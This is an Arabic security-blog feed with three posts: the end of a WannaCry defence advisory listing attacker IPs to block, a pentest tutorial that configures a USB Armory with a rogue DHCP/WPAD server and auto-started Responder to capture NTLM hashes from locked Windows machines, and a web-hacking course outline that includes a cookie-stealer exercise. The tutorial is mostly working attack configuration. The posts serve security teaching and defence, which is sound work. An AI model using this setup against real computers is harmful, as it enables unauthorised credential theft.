٣- اذا كان لدي شركتك اي سرفرات متصلة بالانترنت فتأكد من ان port 445 و port 139 لا يمكن الوصول اليهم من خارج شكبتك او من خلال الانترنت بصورة عامة

٤- المخترقين يقومون باستخدام الايبيهات التاليه للتحكم في الفيروس او في الاجهزه المخترقه لذا ننصح وبشدة أن تقوم بالبحث داخل ال SIEM Solution الخاص بشركتك عن اي سجلات logs لها علاقه بهذه الايبيهات واذا لم يكن لدي شركتك SIEM Solution فيمكنك البحث في السجلات الخاصه بال Proxy او DNS Logs
الخاصه بشركتك عن تلك الايبيهات للتأكد من ان أجهزة شركتك لم يصيبها هذا الفيروس

213.61.66.116
171.25.193.9
163.172.35.247
128.31.0.39
185.97.32.18
178.62.173.203
136.243.176.148
217.172.190.251
94.23.173.93
50.7.151.47
83.162.202.182
163.172.185.132
163.172.153.12
62.138.7.231
188.166.23.127
193.23.244.244
2.3.69.209
146.0.32.144
50.7.161.218
217.79.179.77
212.47.232.237
81.30.158.223
79.172.193.32
89.45.235.21
38.229.72.16
188.138.33.220

كما ننصح أيضا بإضافة هذه القائمة من الأيبيهات الي ال IPS الخاص بشركتك او وضعهم علي قائمة الحظر.

٥- قم بإرسال بريد إلكتروني لموظفين شركتك توضح لهم فيها أن لا يقوموا بفتح اي بريد الكتروني به مرفقات مطلقااا الا اذا كانوا متأكدين من مصدر الرساله وهو شخص موثوق مائه بالمائه.

٦- بالطبع يتوجب عليك نسخ ملفاتك المهمه بشكل دائم حتي تتفادي مثل هذا النوع من الفيروسات ويمكنك استرجاع ملفاتك في اي وقت.

٧- هذه القائمة تحتوي جميع الهاشات الخاصه بملفات الفيروس ويمكنك ايضا استعمالها للتأكد من سلامة انظمة واجهزة شركتك من هذا الفيروس كالبحث بها علي اي Endpoint monitoring solutions خاص بشركتك:
https://gist.github.com/Blevene/42bed05ecb51c1ca0edf846c0153974a

مراجع هامة يمكن قرآئتها:

http://blog.talosintelligence.com/2017/05/wannacry.html

https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100

 

The worm that spreads WanaCrypt0r

سرقة الصلاحيات من جهاز ويندوز مغلق باستخدام USB Armory

$
0
0

USB Armory

موضوعنا اليوم هو موضوع جميل ومهم جدا لل pentester و ال red teamer ويصنف تحت ال Physical Social Engineering Attack. اليوم سنتعلم كيفية سرقة ال NTLM hashes من جهاز ويندوز حتى لو كان الجهاز في Locked باستخدام USB Armory device.

نستفيد من هاشات ال NTLM في سيناريوهات كثيرة منها على سبيل الذكر لا الحصر

  • الدخول على ال Shared folders
  • أو في هجمات ال PTH على الجهاز أو على الخوادم التي قد يدخلها المستخدم من جهازه المستهدف
  • تنفيذ أوامر عن بعد على الجهاز المستهدف باستخدام psexec
  • محاول كسر الهاش و الحصول على كلمة المرور الحقيقة باستخدام أداة hashcat (قد تستغرق وقت طويل جدا)
  • إلخ

الجدير بالذكر هنا أنه لن تعيقنا أي Group policy  تمنع استخدام ال USB storage لان الكمبوتر المستهدف سيتعرف عليه على أنه USB Ethernet device.

ما هو جهاز USB Armory ؟

ببساطة, هو عبارة عن جهاز كومبيوتر بحجم Flash drive. تستطيع أن تثبت عليه نظام تشغيل وتتعامل معه بكامل خصائص نظام التشغيل. مكونات USB Armory المادية أو ال Hardware مفتوحة المصدر, بمعنى أنك تستطيع أن تطلع على تفاصيل تصميم الجهاز والتغيير في مكوناته كما تشاء.
قامت شركة InversePath والتي تم الاستحواذ عليها من شركة F-Secure والمتخصصة في عمل أجهزة بنية تحتية آمنة.
سعر الجهاز هو 155 دولار أمريكي

يحتوي جهاز USB armory على microSDcard كوحدة تخزين وهنا قائمة بال microSD cards المدعومة رسمية ولكنها لا تنحصر في هذه القائمة. فكل ال microSDcard الحديثة مدعومة ولكن يفضل أن تكون ذات سرعة عالية في القراءة والكتابة. أشهر الأنواع المدعومة والمتوفرة في جميع الدول العربية هي SanDisk لكن بشرط أن تكون Ultra. وحدة التخزين هذه هي التي تحتوي على نظام التشغيل والذي سنغطي اليوم طريقة تحميل و تثبيت و إعداد النظام عليها.

الخطوة الأولى:/ تحميل نظام التشغيل وتثبيته

في البداية نذهب إلى صفحة انظمة التشغيل المدعومة رسميا من هنا. كما أحبذ أن نستخدم نسخة USB armory base images. قد يستغرب عدم اختيارالنسخة ال Kali لكن بعد بحث وجدت أن نسخة الكالي يشتكي بعض الناس منها ووجود بعض ال Bugs في منصة ARM لهذا. كما أن النسخة التي اخترتها هي نفس ما تستخدمه الكالي تماما ولا شي مختلف على الإطلاق بل بالعكس تأتي النسخة مجردة تماما من جميع البرامج مما يجعلها صغيرة الحجم وسريعة.

الأن نذهب إلى الرابط تحميل النظام ونحمل أخر image موجودة. حاليا النسخة (usbarmory-debian_jessie-base_image-20170518.raw.zip) هي الأحدث حتى تاريخ كتابة هذا المقال.

1. تحميل النظام

wget -c https://github.com/inversepath/usbarmory-debian-base_image/releases/download/20170518/usbarmory-debian_jessie-base_image-20170518.raw.zip

نتأكد من أن أننا حملنا النسخة بشكل سليم

sha256sum usbarmory-debian_jessie-base_image-20170518.raw.zip

يجب أن تكون المخرجات كما في الصفحة التحميل الرسمية.

نفك ضغط النظام
unzip usbarmory-debian_jessie-base_image-20170518.raw.zip

ينتج عنه ملف
usbarmory-debian_jessie-base_image-20170518.raw

2. معرفة مكان أو تسمية ال microSD card في الجهاز

الآن دخل ال micro SD card في جهازك, جهاز الكمبيوتر الخاص بك وليس ال USB armory. ثم اعرض جميع وحدات التخزين الموجودة في جهازك
fdisk -l

في حالة جهازي كان تسمية ال SD cards هي /dev/sdc وقد تخلف التسمية عنده. كن حذر جدا هنا لأن في مرحلة الثبيت لو اخترت وحدة تخزين خاطئة ستقوم بمسح كل ما على تلك وحدة ووضع نظام التشغيل عليها! لهذا وجب التنبيه

 

3. تثبيت النظام على ال microSD card

بصلاحيات ال root نفذ الأمر التالي: (انبته لمسار وحدة التخزين هنا)
dd if=usbarmory-debian_jessie-base_image-20170518.raw of=/dev/sdc bs=1M conv=fsync

تستغرق هذه العملية لتكتمل ما بين 3 إلى 4 دقائق. لاحظ أننا استخدمنا /dev/sdc وليس /dev/sdc1

الأن أخرج ال microSD card من جهازك وركبه في الـ USB armory. أنصحك بالتعامل مع ال USB armory برفق لأن أجزاءه حساسة وخفيفة جدا.
وصل ال USB armory في جهازك في أي منفذ من منافذ ال USB الخاصة بكمبيوترك وانتظر 20 ثانية حتى يعمل نظام التشغيل بشكل كامل. ستلاحظ خلالها أنها تنير وتنطفئ بشكل مستمر. بعد انتظارك نفذ الأمر
ifconfig

سترى كرت شبكة جديد يأخذ IP محدد تلقائيا وهو 10.0.0.2

الخطوة الثانية:/ إعداد نظام التشغيل

لأننا نشارك الإنترنت مع نظام ال USB Armory يجب أن نجعل نظام التشغل الأساسي يعمل كـ Gateway بالخطوات التالية
1. اسمح بتمرير ال packets

echo 1 > /proc/sys/net/ipv4/ip_forward

2. إضافة iptables rules وتفعيل ال masqurade

iptables -I FORWARD -j ACCEPT
iptables -t nat -I POSTROUTING -o wls1 -j MASQUERADE

حيث wls1 هو كرت الشبكة المتصل بالإنترنت

الآن ادخل إلى الUSB armory عن طريق ال SSH على العنوان 10.0.0.1 وهذه العناوين ستكون ثابته دائما
ssh usbarmory@10.0.0.1

كلمة المرور الافتراضية هي: usbarmory

نبدأ إعداد النظام

1. تحديث المخازن والنظام

المخازن الافتراضية التي تأتي مع التوزيع ليست كافية وبها إصدارات قديمة وبرامج أقل لهذا سنقوم بعمل تحديث مرتين. مرة بالمخازن الافتراضية والثانية بالمخازن التي نريدها
تكأد أنك تصل إلى الانترنت من ال USB Armory ثم ابد بالتحديث
apt update && apt upgrade

ثبت البرامج التالية
apt install wget apt-transport-https dirmngr

الأن اذهب إلى الموقع التالي https://debgen.simplylinux.ch ثم اختر Stable واضغط Generate. سيظهر لك المخازن المطلوبة. نسخها في المسار /etc/apt/sources.list
ضع علامة # أمام المخازن القديمة لتجاهلها.
الأن نفذ الأمر التالي مرة أخرى
apt update && apt upgrade

2. تثبيت البرامج المطلوبة

ثبت البرامج التالية
apt -y install curl git screen sqlite3 build-essential libreadline-dev libssl-dev libpq5 libpq-dev libreadline5 libsqlite3-dev libpcap-dev autoconf postgresql pgadmin3 zlib1g-dev libxml2-dev libxslt1-dev libyaml-dev inotify-tools

apt install -y ruby ruby-dev
gem install sqlite3

apt install -y python python-pip python-dev
pip install pycrypto

 

3. إعداد ال DHCPd

خذ نسخة احتياطية من الملف
cp /etc/dhcp/dhcpd.conf /etc/dhcp/dhcpd.conf.orig

واجعل محتويات الملف الأصلي كالتالي

#
# Sample configuration file for ISC dhcpd for Debian
#

# have support for DDNS.
ddns-update-style none;

# option definitions common to all supported networks...
option domain-name "attacker.zone";
option domain-name-servers 10.0.0.1;

default-lease-time 600;
max-lease-time 7200;

# If this DHCP server is the official DHCP server for the local
# network, the authoritative directive should be uncommented.
authoritative;

# Use this to send dhcp log messages to a different log file (you also
# have to hack syslog.conf to complete the redirection).
log-facility local7;

# wpad - Web Proxy Auto-Discovery Protocol
option local-proxy-config code 252 = text;

# A slightly different configuration for an internal subnet.
subnet 10.0.0.0 netmask 255.255.255.0 {
range 10.0.0.2 10.0.0.3;
default-lease-time 60;
max-lease-time 72;
option routers 10.0.0.1;
option local-proxy-config "http://10.0.0.1/wpad.dat";
}

 

4. تحميل برنامج Responder

برنامج Responder هو واحد من أشهر البرامج حاليا في عمل خادم وهمي للكثير من الخدمات مثل HTTP/SMB/MSSQL/FTP/LDAP والتي تفيد في حقن الاتصال داخل الشبكة ويستخدم كثيرا في هجمات ال MiTM.
mkdir /pentest && cd /pentest
git clone https://github.com/spiderlabs/responder
chmod +x Responder.py

لاحظ في في إعدادات ال dhcp server أضفنا تحت WPAD أو Web Proxy Auto-Discovery Protocol وهو رابط إعدادات البروكسي والتي سيجبر فيه الجهاز المستخدم أن يذهب إلى هذا الرابط ويحملها ليقوم باكتشاف البروكس (بروكسي وهمي عن طريق برنامج Responder) قبل تصفحه أي موقع.

تشغيل البرامج تلقائيا عند بدء النظام

كل ما نريده هنا أن نجعل ال USB armory أن تشغل تلقائيا ال DHCP وبرنامج Responder بمجرد أنا يعمل النظام.

#!/bin/sh -e
#
# rc.local
#
# This script is executed at the end of each multiuser runlevel.
# Make sure that the script will "exit 0" on success or any other
# value on error.
#
# In order to enable or disable this script just change the execution
# bits.
#
# By default this script does nothing.

# Generate ssh host keys if missing
FILES=$(ls /etc/ssh/ssh_host_* 2> /dev/null | wc -l)
if [ "$FILES" = "0" ]; then
while [ $(cat /proc/sys/kernel/random/entropy_avail) -lt 256 ]; do
sleep 1;
done
/usr/sbin/dpkg-reconfigure openssh-server
fi

# Start DHCP server
if ! pgrep -x "dhcpd" > /dev/null
then
echo "Starting DHCPd" >> /root/rc.log
echo '' > /var/lib/dhcp/dhcpd.leases
/usr/sbin/dhcpd
fi

# Start Responder
echo "Staring Responder" >> /root/rc.log
/usr/bin/screen -dmS responder bash -c 'cd /pentest/responder/; python Responder.py -I usb0 -f -w -r -d -F'

echo "Staring cred watch" >> /root/rc.log
/usr/bin/screen -dmS notify bash -c 'while inotifywait -e modify /pentest/responder/Responder.db; do shutdown -h now; done'

exit 0

 

الخطوة:الثالثة:/ تنفيذ الهجوم واستعادة البيانات والاستفادة منها(اختراق الجهاز المستخدم)

الأن لم يبقى سوى توصيل USB Armory في الجهاز المستهدف والانتظار حتى يعمي ثم تنطفئ الإنارة تماما.

بعد اكتمال الهجوم وأخذ جهازنا, نستطيع أن نوصل ال USB Armory في الكومبيوتر الخاص بنا والحصول على الهاشات والصلاحيات التي تم جمعها

يتم تخزين الصلاحيات في مكانين
أولها قاعدة بيانات
/pentest/responder/Responder.db

ثانيها
/pentest/responder/logs/(MODULE_NAME)-(HASH_TYPE)-(CLIENT_IP).txt

وأفضل الملف الأول Responder.db لأنه يخزن جميع أنواع البيانات المسروقة ولا يحتاج منك البحث في أكثر من ملف مثل المسار الثاني.

قمت بعمل سكريبت صغير يقرأ قاعدة البيانات بشكل مرتب و سهل

#!/usr/bin/env ruby 
# KING SABRI | @KINGSABRI
# Responder database reader 
#
require "sqlite3"

if ARGV.size == 1 
  responder_db = ARGV[0]
else
  puts "Respnder.db path required!\nUsage: ruby responder-reader.rb /path/responder/Responder.db"
  exit 
end 

# Open
db = SQLite3::Database.new responder_db
records = db.execute "SELECT * FROM responder;"
records.each do |record|
 puts "Timestamp:  #{record[0]}"
 puts "Module:     #{record[1]}"
 puts "HashType:   #{record[2]}"
 puts "IPaddress:  #{record[3]}"
 puts "Hostname:   #{record[5].split('\\')[0]}"
 puts "Username:   #{record[5].split('\\')[1]}"
 puts "Cleartext:  #{record[6]}"
 puts "Hash:       #{record[7]}"
 puts "Full Hash:  #{record[8]}"
 puts 
end 
puts "[+] Number of records: #{records.size}"

 

ويستخدم بهذه الطريقة
ruby responder-reader.rb /pentest/responder/Responder.db

النتيجة

Timestamp: 2017-06-21 06:23:10
Module: HTTP
HashType: NTLMv2
IPaddress: 10.0.0.2
Hostname: DESKTOP-9INJ6LJ
Username: KING
Cleartext:
Hash: 8CVA8AFAF9909DA597CF3B7D84483438:0101000000000000241A342558EAD2013F8E3846E6C00698000000000200060053004D0042000100160053004D0042002D0054004F004F004C004B00490054000400120073006D0062002E006C006F00630061006C000300280073006500720076006500720032003000300033002E0073006D0062002E006C006F00630061006C000500.....
Full Hash: KING::DESKTOP-9INJ6LJ:1122334455667788:8CVA8AFAF9909DA597CF3B7D84483438:0101000000000000241A342558EAD2013F8E3846E6C00698000000000200060053004D0042000100160053004D0042002D0054004F004F004C004B00490054000400120073006D0062002E006C006F00630061006C000300280073006500720076006500720032003000300033002E0073006D0062002E006C006F00630061006C000500.....
[+] Number of records: 1

 

فيديو يوضح نتيجة الهجوم

 

بالإضافة إلى ما تم ذكره من سرقة ال NTLM hashes والجهاز وسطح المكتب مغلق, سيعمل الهجوب على إنشاء بروكسي وهمي (تذكر إعدادت ال DHCP و WPAD) ويجبر النظام على استخدامه فلو دخل المستخدم إلي جهازه وحاول تصفح الأنترنت ستظهر له شاشة تطلب إدخال اسم المستخدم كلمة المرور (غالبا ما سيدخل المستخدم كلمة المستخدم وكلمة المرور) وستخزن أيضا في قاعدة البيانات على شكل NTLM.

 

في النهاية أحب أن أنوه على أن استخدامات الـ USB Armory لا تنحصر في ما تطرقنا إليه فقط.

 

المصادر

إنطلاق كورس إختبار إختراق تطبيقات الويب باللغة العربية مجانا

$
0
0

السلام عليكم ورحمة الله وبركاته أحبتي في الله.

يسر مدونة مجتمع الحماية العربي أن تعلن عن إطلاق كورس إختبار إختراق تطبيقات الويب باللغة العربية
Web Applications Penetration Testing Course

واللذي يشرح بالتفصيل ثغرات المواقع مع أمثلة عمليه علي شركات عالمية عن كيفية حدوث الثغرات وكيف يتم إستغلالها.

تم التركيز في الكورس علي وضع أساسيات مهمه جدا لابد وأن يفهمها كل مختبر إختراق قبل البدأ في إكتشاف وإستغلال الثغرات.

ما اللذي سيتم شرحه في الكورس:

Introduction Day:
1. Course Requirements:
Installing necessary browser plugins (Wappalyzer, FlagFox, FoxyProxy)
Virtualbox + Ubuntu
Java & Burp Suite

First session (Warming Up):
Deep dive into data leaks (Haveibeenpwned.com & Shodan.io)

Part 1:
1. Linux Basics:
Introduction to Linux Structure & files permissions.
Packages & installation process
Command line examples
(man, apt-get, apt-cache, find, grep, cut, sort, curl, wget, >, >>, |, ;, head, tail, nano, touch, &, ps, df, top)
Installing LAMP stack.

2. Introduction Topics:
1- OSI Model in a Nutshell (Life of a Packet)
2- Wireshark & NetworkMiner
3- TCP/UDP/HTTP/HTTPS Protocols
3- Nmap basics
4- HTTP Methods & HTTP Response Types
5- HTTP Headers
6- Web Authentication Methods, Cookies, Sessions
7- Encryption, Encoding, Hashing
10- DNS Basics, A, MX, CNAME Records
11- PTR Records (Reverse DNS) & PassiveDNS (Yahoo or Facebook Example)
12- What happens when I open https://www.facebook.com in my browser?
13- Basic PHP examples (GET vs POST)
14. CORS, CSP & SOP

3. BurpSuite:
1- What is Burp and why we need it?
2- A Jurney into Burp Tabs
3- Burp configuration
4- Get your hands dirty using burp

Part 2:
1. Easy Web Applications Attacks:
1- HTTP Verb Tampering Attack
2- Open Redirection
3- Host Header Attacks
4- Session Fixation
5- Text Injection & HTML Injection
6- ClickJacking
5- Insecure Direct Object Reference (IDOR)
6- Hanging Fruits (Forgotten backup files and status pages)

2. Meduim Web Applications Vulnerabilities:
1. Cross Site Scripting (XSS)
1- Basics of XSS
2- Reflected, Stored & DOM based XSS
3- XSS Payloads
3- Google XSS challenges step by step
4- Your task is to write and test XSS Cookie stealer

2. Cross Site Request Forgery (CSRF)
1- CSRF Basics
2- How to find a CSRF Vulnerability
3- CSRF Exploitation

3. Subdomain Takeover

Part 3:
1. Advanced Web Applications Vulnerabilities:
1. SQL Injection
1- SQL Basics
2- SQL Injection Basics & SQL Types (Union Based, Boolean Based, Time Based)
3- Manual Union Based SQL Injection Exploitation
4- Manual Boolean Based SQL Injection Exploitation
5- Manual Time Based SQL Injection Exploitation
6- A Walk through SQLMAP
7- Exploiting SQL Injection Vulnerabilities with SQLMAP

2. Server Side Request Forgery (SSRF)
1- SSRF Basics
2- How to find SSRF Vulnerabilities
3- SSRF Exploitation Demo
4- SSRF vs XSPF

3. Remote Command Execution
1- RCE Basics
2- How to find RCE Bugs in the Source Code (Example on PHP)
3- RCE Exploitation Demo (ShellShock or else)

4. Remote Code Execution
1- RCE Basics
2- How to find RCE Bugs in the Source Code
3- RCE Exploitation Demo on Yahoo

5. Local/Remote File Inclusion

6. XXE (External Entity Injection)

7. CSTI & SSTI (Client/Server Side Template Injection)

7. Object Injection Vulnerabilities

8. File Upload Attacks
1- Bypassing file uploads security restrictions (Multiple methods)
2- Demo on Twitter.com

Part 4:
8. Real Life Demo
1. Enumerating and scanning 200.000+ Yahoo Hostname!

9. Conclusion & References

بفضل من الله عز وجل إنتهينا في الوقت الحالي من تسجيل 23 درس وتم طرحهم جميعا علي Playlist واحده يتم تحديثها بشكل اسبوعي بدروس جديدة من الكورس. يمكنكم مشاهدة الدروس من خلال الرابط التالي:

معلومات يجب أن تعرفها عن الكورس:

١- دروس الكورس يتم تحديثها وطرح دروس جديدة يوم الأحد من كل اسبوع, لذا ننصحك بالإشتراك في القناة حتي يصلك الجديد أول بأول

٢- تم إنشاء جروب علي الفيس بوك خاص بالكورس حتي يتثني لمن لديه أي سؤال او لديه صعوبة في فهم شئ ما من طرح أسالته وسيتم الإجابه عليها من قبل المختصين إن شاء الله. رابط جروب الفيس بوك:
https://www.facebook.com/groups/328952157561088/

٣- الكورس مجاني وسيظل مجاني حتي إنتهائه إن شاء الله ولا نسألكم سوي الدعاء لي ولوالدي بالرحمه والمغفرة

٤- الدروس التي تم الإنتهاء منها كانت شروحات للاساسيات التي يحتاجها أي مختبر إختراق, والدروس القادمة ان شاء الله بدأ من الأحد القادم ستكون مختصة بالويب Web فقط

٥- تحتاج أن تقرأ البوست التالي قبل أن تبدأ في الكورس لأنه يحتوي علي إجابات لإسئله كثيرة يتم سؤالها بشكل مستمر:
https://www.facebook.com/groups/328952157561088/permalink/343153629474274/

٦- تم تجهيز lab للمتدربين في الكورس حتي يتمكنوا من التطبيق العملي وحل مسابقات تمكنهم من تطوير مهاراتهم في مجال اختبار الإختراق. ال Lab الأول واللذي يخص الدروس التي تم الإنتهاء منها يمكنكم الوصول إليه من خلال الرابط التالي ويمكنكم أيضا طرح أسالتكم في نفس الرابط. هل يمكنكم حله وتخطيه؟

https://www.facebook.com/groups/328952157561088/permalink/343153629474274/

٧- ال Lab الخاص بثغرات الويب سيتم طرحه فور البدأ بشرح ثغرات ال SQL Injection ان شاء الله

وفي الأخير أود أن أشكر كل من الأشخاص التالية أسماءهم لمساهمتهم في أن يخرج الكورس بهذا الشكل ومساهمتهم في الإجابة علي أسالة المتدربين بشكل مستمر:

محمود علام

محمد عبدالعاطي

أحمد أبوالعلا

اسامه النجار

راجين من الله عز وجل أن نكون عند حسن ظنكم بنا.

Viewing all 61 articles
Browse latest View live


<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>